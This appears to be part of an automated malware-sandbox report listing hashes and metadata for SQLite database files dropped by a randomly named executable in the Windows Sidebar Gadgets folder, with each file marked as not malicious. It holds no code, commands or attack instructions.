                                                                                                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5712781801655107
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5712781801655107
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):98304
                                                                                                                                                                  Entropy (8bit):0.08235737944063153
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
